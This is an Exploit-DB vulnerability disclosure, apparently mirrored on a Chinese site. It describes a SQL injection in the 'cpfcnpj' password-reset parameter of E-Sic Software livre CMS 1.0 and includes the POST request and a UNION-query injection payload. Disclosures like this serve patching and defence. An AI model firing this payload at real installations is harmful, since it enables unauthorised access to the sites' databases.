E-Sic Software livre CMS – ‘cpfcnpj’ SQL Injection - 体验盒子

作者： Elber Tavares

日期： 2017-10-12

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/42981/

# Exploit Title: E-Sic Software livre CMS - Sql Injection
# Date: 12/10/2017
# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
# Download: https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations:

http://whiteboyz.xyz/esic-software-publico-sql-injection.html

vulnerability is in the password reset parameter of the software,
where we can send sql parameters and interact directly with the
database. "Informe seu CPF ou CNPJ para enviarmos nova senha:"
---------------------------------------------------------------------

Url: http://vulnerablesite/esic/reset/

POST: cpfcnpj=test&btsub=Enviar

Parameter: cpfcnpj (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: cpfcnpj=test' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT
('qbqqq','HMDStbPURehioEoBDmsawJnddTBZoNxMrwIeJWFR'),'qzbpq'),NULL,NULL--
GJkR&btsub=Enviar